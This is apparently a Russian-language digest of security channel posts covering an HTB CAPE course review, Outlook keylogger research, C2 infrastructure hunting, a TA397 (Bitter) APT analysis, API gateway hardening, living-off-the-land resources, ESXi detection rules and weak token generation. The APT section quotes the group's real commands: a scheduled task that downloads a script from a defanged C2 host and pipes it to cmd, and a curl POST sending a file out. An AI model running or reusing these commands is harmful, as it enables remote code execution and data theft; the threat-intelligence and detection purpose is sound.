Fsecurity | HH

🔗Ссылка: https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/

🔗Ссылка: https://habr.com/ru/companies/pt/articles/916888/

🙃 HTB Certified Active Directory Pentesting Expert (HTB CAPE) Как и обещал, выкладываю обзор Вопросы автору можно задать в чате или комментариях

Недавно я завершил курс и успешно сдал экзамен HTB Certified Active Directory Pentesting Expert (CAPE) от Hack The Box Academy. Меня зовут Артём Метельков, я занимаюсь пентестами инфраструктуры и фишинг-атаками. В этом обзоре поделюсь своими впечатлениями и расскажу, что вас ждёт на пути к этой сертификации. HTB CAPE - это чисто практическая штука. Тут не просто учат, а реально проверяют, как ты усвоил материал. Экзамен - это стенд с 10+ машинами, несколькими доменами и разными трастами между ними. В общем, всё как в реальной жизни.

🔗 Пентест AD на максималках, мой опыт HTB CAPE Коротко о курсе: Интенсивный обучающий курс, который охватывает широкий спектр техник и инструментов для проведения пентеста 💻 Active Directory. Курс не предназначен для начинающих в области кибербезопасности, а вот опытные специалисты смогут найти для себя много полезного #htb #cert #exam ✈️ Whitehat Lab 💬Chat

Мутация Exchange. Как мы аномалии в Outlook-страницах ловили 😮 В продолжение историй с расследований инцидентов (о них можно почитать вот тут, здесь и частично послушать тут) мы решили проанализировать общую концепцию вставок вредоносного кода в страницы аутентификации Microsoft Outlook. В итоге: • Помимо обнаруженного на расследованиях инцидентов кейлоггера, обнаружили множество других аналогичных вредоносов. • Ключевое отличие всех вредоносных фрагментов кода заключается в способе отправки учетных данных жертв: в нем применяются сохранение данных в файл на сервере, DNS-туннелирование, отправка сообщений в телеграм-бота и другие техники. • Заражения были обнаружены в 26 странах. Большинство скомпрометированных серверов находятся во Вьетнаме, Китае, России, Тайване. • Как показывает статистика, основная причина успешных атак на серверы — отсутствие установленных обновлений безопасности; на 3 из 65 серверов обновления отсутствовали с 2013 года. 📫 Какие кейлоггеры были обнаружены, куда и как хакеры отправляют данные жертв и как обнаружить вредоносный код в странице Outlook, рассказали в нашем исследовании. #TI #IR #Malware @ptescalator

🕵️ Как из одного IP вытянуть больше информации Во время TH или анализа инцидента часто всё начинается с одного объекта — подозрительного IP-адреса/домена. Но за ним может стоять целый кластер C2, фишинговых доменов и прокси. 📦 Что делать дальше? Провести инфраструктурную разведку: поиск связей, повторно используемых конфигураций и других узлов. 🛠 Часть полезных инструментов: ▪️ Whois / Passive DNS ▪️ Shodan, Censys ▪️ VirusTotal, AbuseIPDB ▪️ Hunt.io 🔍 Сегодня рассмотрим пример Hunt.io 1. Старт с IP Адрес 168.100.9[.]71 всплыл в фиде/иницденте как подозрительный. 2. Базовая инфа 📍 Хостинг: BL Networks (анонимные VPS) 📛 Домен: btc-winnings-made[.]com → намёк на криптоскам 📌 Один домен на IP → не shared-хостинг → признак выделенного C2 3. Порты и сервисы Открыты 22 (SSH), 80, 443. Nginx, ответ на 443 — 404 с заглушкой. ⚠️ Признаков Cobalt Strike или чего-то редкого — нет. 4. Сертификаты 🔐 Self-signed, CN = localhost, Issuer = Internet Widgits Pty Ltd 🧬 Используем JA4X фингерпринт → ищем похожие конфигурации 5. SQL-поиск в Hunt По JA4X найдено всего 6 хостов → высокая уникальность → можно связывать в одну группу. 6. Проверка в VirusTotal Часть адресов детектится, есть упоминание Latrodectus (модульная малварь). Изолированный IP оказался частью скрытой инфраструктуры. ✔️ Из одного IP получен кластер из нескольких C2-хостов ✔️ Методика применима для охоты на инфраструктуру до компрометации ✔️ Позволяет строить детект на основе поведения: VPS-провайдер, TLS-паттерны, конфигурации, а не конкретные адреса 🔗https://hunt.io/blog/practical-guide-unconvering-malicious-infrastructure 🦔 THF

🔗Ссылка: https://habr.com/ru/companies/pt/articles/917248/

🔗Ссылка: https://habr.com/ru/articles/916788/

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🧵 TA397 (Bitter) 📌 Новый отчёт от Proofpoint и Threatray раскрывает, как на протяжении 8 лет предположительно индийская APT-группа TA397 ведёт разведку против дипмиссий, правительств и оборонных структур в Европе и Азии.

TA397 will frequently target organizations and entities in Europe that have interests or a presence in China, Pakistan, and other neighboring countries on the Indian subcontinent.  

☕ Немного контекста Группа давно известна под именем Bitter и подозревается в работе на индийские интересы. Но вместо сложных эксплойтов — ставка на точный фишинг и нестандартный подход к Scheduled Tasks. Работают строго по графику — 9:00–17:00 по IST, как в офисе.

TA397’s hands-on-keyboard and infrastructure operations align with the standard working hours of the Indian Standard Time (IST) timezone. 

  ✉️ Входной вектор: дипломатия, CHM и .MSC TA397 маскируются под посольства, министерства и оборонные ведомства. Темы писем максимально приближены к реальности: "AUTHORIZATION TO RENEW CONTRACTS OF ECD AGENTS" "SituationNote : SouthKorea_Martial law" "Note from Embassy of Mauritius" "Key National Defense R&D Projects" Вложения — RAR-архивы с .CHM, .LNK, .MSC. Изредка — IQY и Access DB. ⚙️ Цепочки заражения 🎣 Email → архив → файл → PowerShell → Scheduled Task → C2 Пример: MSC-файл запускает mmc.exe, который создаёт задачу через schtasks, использует conhost.exe и PowerShell 🔍 Команда, достойная отдельной кружки чая "C:\\Windows\\System32\\conhost.exe" --headless cmd /c ping localhost > nul & schtasks /create /tn "EdgeTaskUI" /f /sc minute /mo 16 /tr "conhost --headless powershell -WindowStyle Minimized irm 'woodstocktutors[.]com/jbc.php?fv=$env:COMPUTERNAME*$env:USERNAME' -OutFile 'kwe.cc'; Get-Content 'kwe.cc' | cmd" Что тут: ping → создаёт задержку schtasks создаёт задачу PowerShell качает скрипт, читает его и передаёт в cmd 📌 C2-запросы всегда включают COMPUTERNAME и USERNAME — иногда через *, .., --, ; и даже __ — чтобы запутать сигнатуры. 🎯 Ручной контроль После успешной установки задачи, TA397 ждут, и только если цель «интересна», загружают RAT (например, Demon Agent или BDarkRAT). Примеры активности: curl -X POST -F "file=@C:\\programdata\\abc1.pdf" http://1.1.1[.]1/svupfl.php?oi=HOST_USER Собирают systeminfo, tasklist, wmic Иногда монтируют удалённую шару \\IP\tempy, откуда грузят RAT’ы (wmRAT, MiyaRAT) Упаковка PE-файлов вручную: sh1.txt + sh2.txt = shh.exe 🧠 Детект 1. conhost в headless-режиме event_type: "processcreatewin" AND proc_file_name: "conhost.exe" AND cmdline: "headless" 2. PowerShell → Get-Content → cmd event_type: "processcreatewin" AND proc_file_name: "powershell.exe" AND cmdline: ("get-content" AND "cmd") 3. C2-сервер с Let’s Encrypt + PHP endpoint + имя машины https://domain[.]com/sdf.php?fv=HOST*USER Весь материал в пост не уместить, поэтому к прочтению: 🔗 https://www.proofpoint.com/us/blog/threat-insight/bitter-end-unraveling-eight-years-espionage-antics-part-one 🔗 https://www.threatray.com/blog/the-bitter-end-unraveling-eight-years-of-espionage-antics-part-two 🦔 THF

🔗Ссылка: https://habr.com/ru/companies/mws/articles/915916/

🔗Ссылка: https://securelist.ru/librarian-ghouls-apt-wakes-up-computers-to-steal-data-and-mine-crypto/112627/

😊 API Gateway как линия фронта в Web3

Внимание: CatSwap в этом тексте — не стартап и не “очередной ”, а наш pet-проект для иллюстрации. Он нужен, чтобы показать, как Web3-сервисы должны мыслить в части защиты API — не опираясь на бэкэнд, а начиная с Gateway.

В Web3 большинство угроз входит не через «модные» DeFi-примитивы, а через вполне классический API-интерфейс. Просто формат другой: не form-data, а подписанный JSON с маршрутом, суммой и временной меткой. CatSwap, как агрегатор, — типичный пример. Все транзакции, котировки, swap-запросы проходят через публичное API. ✅ Чеклист по защите API Gateway ▫️ HTTPS (TLS 1.2+) + WAF • Принудительное HTTPS; • WAF / WAF с OWASP CRS, бот-контролем и Geo-ACL. ▫️ Аутентификация • JWT в envoy.filters.http.jwt_authn; • Web3-подписи (EIP-191/712) через Proxy-Wasm (X-Address + X-Signature); • Challenge-nonce, защита от replay-атак. ▫️ Авторизация (OPA / ExtAuthz) • RBAC/ABAC-политики по ролям, slippageTolerance, gasPrice, геопозиция, времени суток; • Динамические политики Rego + GitOps-репозиторий. ▫️ JSON-валидация запросов • OpenAPI-схемы → Envoy JSON Validator, ошибка 400 при несоответствии; • Чёткое разделение обязательных и опциональных полей. ▫️ Rate Limit & QoS • /v1/quote ≤ 1000 r/m; /v1/swap ≤ 100 r/m; • Circuit breaker, retry, max concurrent; • Приоритет маршрутов, Kubernetes Resource Limits. ▫️ API Gateway (Envoy + Proxy-Wasm) • JWT (RS256) через envoy.filters.http.jwt_authn; • JSON Schema Validator — строгая валидация payload; • Rate-limit, circuit breaker, retry с экспоненциальным backoff; • ExtAuthz → ML-анализ; • mTLS внутри кластера (Istio-SDS или Envoy native). ▫️ Логирование & мониторинг • JSON Access Logs (path, key, user_id, latency, tx_hash); • Prometheus (p95/p99, ошибки, RPS) / Grafana—дашборды; • OpenTelemetry + Jaeger; трассировка end-to-end; • GitOps-аудит конфигов (ArgoCD/Flux). ▫️ Management plane hardening • Bastion-host с MFA для доступа к административным интерфейсам; • Жёсткие IAM-роли и Just-In-Time elevation для операторов. ▫️ CI/CD & GitOps • Инфраструктура как код (Terraform, Helm); • ArgoCD синхронизация; PR-ревью, tfsec/checkov, canary-релизы. ▫️ Supply chain security & SBOM • Генерация и хранение SBOM для всех контейнеров и зависимостей; • Подпись артефактов (cosign/Sigstore) и верификация на этапе деплоя. ▫️ Контроль изменений и drift detection • Policy as Code (OPA, Terraform Sentinel); • Инструменты проверки конфигураций (tfsec, Checkov, Conftest). ▫️ ML-анализ в Gateway 💻 • Isolation Forest в Seldon Core; Envoy ExtAuthz вызывает /predict; • Блокировка при score > 0.8; алёрты в SIEM/Slack. ▫️ API lifecycle & versioning • Явное управление версиями API, deprecation-policy, backward-compatibility тесты; • Тёмные и канареечные запуски (traffic mirroring) новых эндпоинтов. ▫️ Disaster recovery & multi-region failover • Репликация Gateway в нескольких регионах; автоматический DNS-фейловер; • Документированные RTO/RPO и регулярные drill-тесты. ▫️ Пентесты & Bug Bounty • Ежеквартальные внешние пентесты API Gateway и RPC-узлов; • Запуск программы Bug Bounty (HackerOne / Standoff / bizone) для непрерывного обнаружения уязвимостей. ▫️ План реагирования на инциденты (по просьбе SOC) • Определённые playbook: detection → containment → eradication → recovery; • SLA/TTR для критичных сервисов; регулярные учения. ▫️ Приватные RPC (PrivateLink / IAM) • JSON-RPC узлы скрыты за VPC Endpoint (PrivateLink / PSC); • Доступ по SigV4 / ACL; rate-limit и circuit breaker перед нодами. ▫️ HTTP-security headers • HSTS (Strict-Transport-Security), CSP, X-Frame-Options, X-Content-Type-Options; • Защита от clickjacking и MIME-sniffing. ▫️ Сегментация сети и ограничения доступа • Kubernetes NetworkPolicies; NSG/Security Groups; • Микросегментация: отдельные VPC/subnet для критичных сервисов. 🔫 А зачем В общем, это не просто чеклист для галочки. Это попытка собрать разумную, масштабируемую и живучую архитектуру, в которой API Gateway — не прослойка между интернетом и микросервисами, а полноценная точка принятия решений. #appsec

🔗Ссылка: https://habr.com/ru/articles/916928/

Всем привет! В процессе подготовки одной презентации собирал список ресурсов с описанием Living off the land (LotL) техник атакующих, которым хотел бы поделиться в этой заметке: 🔴 LOLBAS Список бинарных файлов, скриптов и библиотек, для реализации LotL техник 🔴 GTFOBins Список бинарных файлов Unix, которые можно использовать для обхода локальных ограничений безопасности в неправильно сконфигурированных системах 🔴 LOOBins Консолидированный список built-in macOS утилит с подробным описанием 🔴 GTFOArgs Список бинарных файлов Unix, аргументы которых можно использовать для реализации LotL техник 🔴 LOTTunnels Консолидированный список различных инструментов для туннелирования трафика, которые используются злоумышленниками для обеспечения доступа и извлечения информации 🔴 LOLDrivers Список драйверов Windows, которые активно используются в дикой природе 🔴 LOLApps Небольшой список built-in and third-party приложений для Windows и Linux для реализации LotL техник 🔴 LOLESXI Список бинарей и скриптов доступных по дефолту в VMware ESXi, которые можно использовать для реализации LotL техник 🔴 LOLCerts Список утекших code signing сертификатов, которые активно используются в дикой природе 🔴 LOLAD Список AD’s built-in tools с командами и детальным описанием реализации LotL техник 🔴 LOTS Список ресурсов, используемых для создания атакующей инфраструктуры (фишинг, С2, эксфильтрация) 🔴 MalAPI Корреляция вызовов Windows API с техниками, используемыми вредоносным ПО в дикой природе 🔴 FileExtension Список расширений файлов, которые используются для доставки полезной нагрузки 🔴 Bootloaders Список вредоносных загрузчиков для различных ОС, которые используются в дикой природе со ссылками на IOC и правила обнаружения (YARA, Sigma) Я уверен, что этот список далеко не полный, поэтому если знаете еще LotL ресурсы, очень прошу поделиться в комментариях к этому посту🙏 PS: Желаю всем хорошего понедельника и удачной короткой недели!

VMware ESXi Detection Engineering 🛡

T1021.004 Remote Services: SSH, On ESXi, SSH can be enabled either directly on the host (e.g., via vim-cmd hostsvc/enable_ssh) or via vCenter

ESXi становится все большим любимцем для атакующих, в том числе и АРТ, но часто обделен вниманием со стороны команд аналитиков, поэтому накидал ряд базовых правил для детектов аномалий в сети 😒 Включение авторизации по SSH

message: "SSH login enabled"

Могут включить или через vim-cmd hostsvc/enable_ssh или через vCenter 👨‍🦰 Детект попыток авторизации по SSH

message: ("sshd" and "connection from")

Смотрим откуда пытались подключаться к нему 😐 Детект Interactive Shell session started

message: "Interactive shell session started"

После данного лога можно отфильтровать ивенты по ID внутри строки shell[ID_NUMBER] и посмотреть цепочку команд исполненных во время интерактивной сессии и выяснить что пытались запускать, особое внимание стоит уделить встроенной утилите vim-cmd 🔍 🔗 Post: https://detect.fyi/vmware-esxi-logging-detection-opportunities-4fb56411ec21 🧢 s0ld13r

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://www.securitylab.ru/news/560201.php

⛈Небезопасная генерация токена Что может быть проще: сброс пароля, подтверждение почты или аутентификация по токену? Но если ваш токен генерируется геморройно простым методом — у злоумышленника появляется прямой доступ к системе. Давайте разберёмся, почему до сих пор взламываются даже крупные сервисы и почему “уникальный токен” — не всегда синоним безопасности. 🟢 Как появляется проблема: Иногда разработчики генерят токены через стандартные функции вроде rand() или time(), добавляя к ним user_id или инкрементный счетчик. Примеры из реального мира: - Сброс пароля: token = md5(time() . user_id) - Авторизация: просто strval(rand()) ❗️По факту — это не токен, а открытая дверь, где “замок” известен каждому умеющему читать код. Если сервер при отправке ссылки для сброса пароля проверяет только такой токен — любой, у кого есть доступ к user_id и времени генерации, сможет подобрать нужное значение и получить доступ к чужому аккаунту. 🔊 Как это эксплуатируют: Самый частый паттерн: 1. Изучаем токен — часто можно декодировать его, видим время или user_id. 2. Получаем user_id жертвы (через API или просто по URL). 3. Генерируем гипотетические значения токена по шаблону, который использует сервер. 4. Подставляем их в запрос — вход срабатывает. Профит. 📌 Даже хуже, если используется стандартный rand() на популярных языках — достаточно знать seed или время запуска генератора, чтобы воспроизвести последовательность токенов полностью (пример: предсказуемые токены сброса пароля в старых версиях некоторых CMS). 🔔 Как делать правильно? Используйте только криптографически стойкие генераторы случайных чисел: - Для PHP: random_bytes() и bin2hex() - Для Python: secrets.token_urlsafe() - Для Node.js: crypto.randomBytes() Короче — никогда не генерируйте security-токены с помощью наивных функций и не смешивайте их с очевидными константами (user_id, timestamp и прочее)! Любой аудитор кода обязан сразу поднимать тревогу, видя старые добрые md5(time()). Когда вы в последний раз проверяли генерацию токенов в своем проекте? Поделитесь кейсами — у кого встречались "простейшие" реализации? 👀 📶 Полезная ссылка: https://cqr.company/ru/web-vulnerabilities/insecure-token-generation/ ЧТНП | #web

🔗Ссылка: https://habr.com/ru/articles/907452/

🚩 VKACTF 2025 Решения задач на прошедший VKACTF, в котором приняли участие и заняли 2ое место 💻 Райтапы 🔗 Site 🔗 Scoreboard #ctf #vkactf2025 ✈️ Whitehat Lab 💬Chat